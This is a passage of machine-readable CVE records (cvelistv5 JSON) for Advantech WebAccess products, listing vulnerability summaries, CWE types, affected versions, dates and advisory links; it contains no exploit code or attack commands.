"http://www.zerodayinitiative.com/advisories/ZDI-16-124", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-124" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-125", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-125" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-122", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-122" }, { "name": "http://www.zerodayinitiative.com/advisories/ZDI-16-123", "refsource": "MISC", "url": "http://www.zerodayinitiative.com/advisories/ZDI-16-123" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2016-0855", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-12-17T00:00:00", "dateUpdated": "2024-08-05T22:30:05.047Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-14016
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.exploit-db.com/exploits/43340/ | exploit, x_refsource_EXPLOIT-DB | |
http://www.securityfocus.com/bid/101685 | vdb-entry, x_refsource_BID | |
https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T19:13:41.637Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "43340", "tags": [ "exploit", "x_refsource_EXPLOIT-DB", "x_transferred" ], "url": "https://www.exploit-db.com/exploits/43340/" }, { "name": "101685", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/101685" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2017-11-06T00:00:00", "descriptions": [ { "lang": "en", "value": "A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. The application lacks proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an attacker to execute arbitrary code under the context of the process." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2017-12-19T10:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "43340", "tags": [ "exploit", "x_refsource_EXPLOIT-DB" ], "url": "https://www.exploit-db.com/exploits/43340/" }, { "name": "101685", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/101685" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-14016", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. The application lacks proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an attacker to execute arbitrary code under the context of the process." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "43340", "refsource": "EXPLOIT-DB", "url": "https://www.exploit-db.com/exploits/43340/" }, { "name": "101685", "refsource": "BID", "url": "http://www.securityfocus.com/bid/101685" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-17-306-02" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-14016", "datePublished": "2017-11-06T22:00:00", "dateReserved": "2017-08-30T00:00:00", "dateUpdated": "2024-08-05T19:13:41.637Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-12010
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-128-01 | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess Node |
Version: WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:48:58.249Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow an authenticated user to use a specially crafted file to delete files outside the application\u2019s control." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-23", "description": "RELATIVE PATH TRAVERSAL CWE-23", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-05-08T11:40:22", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-12010", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Node", "version": { "version_data": [ { "version_value": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple relative path traversal vulnerabilities exist that may allow an authenticated user to use a specially crafted file to delete files outside the application\u2019s control." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "RELATIVE PATH TRAVERSAL CWE-23" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-12010", "datePublished": "2020-05-08T11:40:22", "dateReserved": "2020-04-21T00:00:00", "dateUpdated": "2024-08-04T11:48:58.249Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2017-16736
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess |
Version: Advantech WebAccess |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T20:35:20.670Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Advantech WebAccess" } ] } ], "datePublic": "2018-01-11T00:00:00", "descriptions": [ { "lang": "en", "value": "An Unrestricted Upload Of File With Dangerous Type issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows a remote attacker to upload arbitrary files." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-434", "description": "CWE-434", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-01-12T01:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2017-16736", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "Advantech WebAccess" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "An Unrestricted Upload Of File With Dangerous Type issue was discovered in Advantech WebAccess versions prior to 8.3. WebAccess allows a remote attacker to upload arbitrary files." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "CWE-434" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-004-02A" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2017-16736", "datePublished": "2018-01-12T02:00:00", "dateReserved": "2017-11-09T00:00:00", "dateUpdated": "2024-08-05T20:35:20.670Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-34540
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.advantech.com/support | x_refsource_MISC | |
https://github.com/ethancsyang/CveProject/tree/main/CVE-2021-34540 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T00:12:50.380Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.advantech.com/support" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://github.com/ethancsyang/CveProject/tree/main/CVE-2021-34540" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.4.2 and 8.4.4 allows XSS via the username column of the bwRoot.asp page of WADashboard." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-06-11T11:26:02", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.advantech.com/support" }, { "tags": [ "x_refsource_MISC" ], "url": "https://github.com/ethancsyang/CveProject/tree/main/CVE-2021-34540" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "cve@mitre.org", "ID": "CVE-2021-34540", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.4.2 and 8.4.4 allows XSS via the username column of the bwRoot.asp page of WADashboard." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.advantech.com/support", "refsource": "MISC", "url": "https://www.advantech.com/support" }, { "name": "https://github.com/ethancsyang/CveProject/tree/main/CVE-2021-34540", "refsource": "MISC", "url": "https://github.com/ethancsyang/CveProject/tree/main/CVE-2021-34540" } ] } } } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-34540", "datePublished": "2021-06-11T11:26:02", "dateReserved": "2021-06-10T00:00:00", "dateUpdated": "2024-08-04T00:12:50.380Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2015-3943
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01 | x_refsource_MISC |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-06T06:04:00.942Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "datePublic": "2016-01-14T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess before 8.1 allows remote attackers to read sensitive cleartext information about e-mail project accounts via unspecified vectors." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2016-01-15T02:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2015-3943", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "n/a", "version": { "version_data": [ { "version_value": "n/a" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess before 8.1 allows remote attackers to read sensitive cleartext information about e-mail project accounts via unspecified vectors." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "n/a" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-16-014-01" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2015-3943", "datePublished": "2016-01-15T02:00:00", "dateReserved": "2015-05-12T00:00:00", "dateUpdated": "2024-08-06T06:04:00.942Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-12002
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.us-cert.gov/ics/advisories/icsa-20-128-01 | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-590/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-624/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-625/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-619/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-634/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-633/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-592/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-591/ | x_refsource_MISC | |
https://www.zerodayinitiative.com/advisories/ZDI-20-622/ | x_refsource_MISC |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | Advantech WebAccess Node |
Version: WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T11:48:57.668Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-590/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-624/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-625/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-619/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-634/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-633/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-592/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-591/" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-622/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess Node", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } ], "descriptions": [ { "lang": "en", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple stack-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2020-05-08T20:06:28", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-590/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-624/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-625/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-619/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-634/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-633/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-592/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-591/" }, { "tags": [ "x_refsource_MISC" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-622/" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2020-12002", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess Node", "version": { "version_data": [ { "version_value": "WebAccess Node Version 8.4.4 and prior, WebAccess Node Version 9.0.0" } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess Node, Version 8.4.4 and prior, Version 9.0.0. Multiple stack-based buffer overflow vulnerabilities exist caused by a lack of proper validation of the length of user-supplied data, which may allow remote code execution." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01", "refsource": "MISC", "url": "https://www.us-cert.gov/ics/advisories/icsa-20-128-01" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-590/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-590/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-624/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-624/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-625/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-625/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-619/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-619/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-634/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-634/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-633/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-633/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-592/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-592/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-591/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-591/" }, { "name": "https://www.zerodayinitiative.com/advisories/ZDI-20-622/", "refsource": "MISC", "url": "https://www.zerodayinitiative.com/advisories/ZDI-20-622/" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2020-12002", "datePublished": "2020-05-08T11:50:42", "dateReserved": "2020-04-21T00:00:00", "dateUpdated": "2024-08-04T11:48:57.668Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-14816
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.securitytracker.com/id/1041939 | vdb-entry, x_refsource_SECTRACK | |
https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C | x_refsource_MISC | |
http://www.securityfocus.com/bid/105728 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | |
---|---|---|---|
▼ | Advantech | Advantech WebAccess |
Version: WebAccess Versions 8.3.1 and prior |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T09:38:14.066Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "1041939", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1041939" }, { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C" }, { "name": "105728", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/105728" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Advantech WebAccess", "vendor": "Advantech", "versions": [ { "status": "affected", "version": "WebAccess Versions 8.3.1 and prior" } ] } ], "datePublic": "2018-10-23T00:00:00", "descriptions": [ { "lang": "en", "value": "Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "STACK-BASED BUFFER OVERFLOW CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-25T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "name": "1041939", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1041939" }, { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01%2C" }, { "name": "105728", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/105728" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "DATE_PUBLIC": "2018-10-23T00:00:00", "ID": "CVE-2018-14816", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Advantech WebAccess", "version": { "version_data": [ { "version_value": "WebAccess Versions 8.3.1 and prior" } ] } } ] }, "vendor_name": "Advantech" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "Advantech WebAccess 8.3.1 and earlier has several stack-based buffer overflow vulnerabilities that have been identified, which may allow an attacker to execute arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "STACK-BASED BUFFER OVERFLOW CWE-121" } ] } ] }, "references": { "reference_data": [ { "name": "1041939", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1041939" }, { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01,", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-296-01," }, { "name": "105728", "refsource": "BID", "url": "http://www.securityfocus.com/bid/105728" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": "CVE-2018-14816", "datePublished": "2018-10-23T20:00:00Z", "dateReserved": "2018-08-01T00:00:00", "dateUpdated": "2024-09-17T02:01:48.026Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-17908
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02 | x_refsource_MISC | |
http://www.securityfocus.com/bid/105736 | vdb-entry, x_refsource_BID | |
http://www.securitytracker.com/id/1041957 | vdb-entry, x_refsource_SECTRACK |
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | WebAccess Versions 8.3.2 and prior. |
Version: WebAccess Versions 8.3.2 and prior. |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T11:01:14.890Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02" }, { "name": "105736", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/105736" }, { "name": "1041957", "tags": [ "vdb-entry", "x_refsource_SECTRACK", "x_transferred" ], "url": "http://www.securitytracker.com/id/1041957" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "WebAccess Versions 8.3.2 and prior.", "vendor": "n/a", "versions": [ { "status": "affected", "version": "WebAccess Versions 8.3.2 and prior." } ] } ], "datePublic": "2018-10-29T00:00:00", "descriptions": [ { "lang": "en", "value": "WebAccess Versions 8.3.2 and prior. During installation, the application installer disables user access control and does not re-enable it after the installation is complete. This could allow an attacker to run elevated arbitrary code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-284", "description": "IMPROPER ACCESS CONTROL CWE-284", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2018-10-30T09:57:01", "orgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "shortName": "icscert" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02" }, { "name": "105736", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/105736" }, { "name": "1041957", "tags": [ "vdb-entry", "x_refsource_SECTRACK" ], "url": "http://www.securitytracker.com/id/1041957" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "ics-cert@hq.dhs.gov", "ID": "CVE-2018-17908", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "WebAccess Versions 8.3.2 and prior.", "version": { "version_data": [ { "version_value": "WebAccess Versions 8.3.2 and prior." } ] } } ] }, "vendor_name": "n/a" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "WebAccess Versions 8.3.2 and prior. During installation, the application installer disables user access control and does not re-enable it after the installation is complete. This could allow an attacker to run elevated arbitrary code." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "IMPROPER ACCESS CONTROL CWE-284" } ] } ] }, "references": { "reference_data": [ { "name": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02", "refsource": "MISC", "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-298-02" }, { "name": "105736", "refsource": "BID", "url": "http://www.securityfocus.com/bid/105736" }, { "name": "1041957", "refsource": "SECTRACK", "url": "http://www.securitytracker.com/id/1041957" } ] } } } }, "cveMetadata": { "assignerOrgId": "7d14cffa-0d7d-4270-9dc0-52cabd5a23a6", "assignerShortName": "icscert", "cveId": 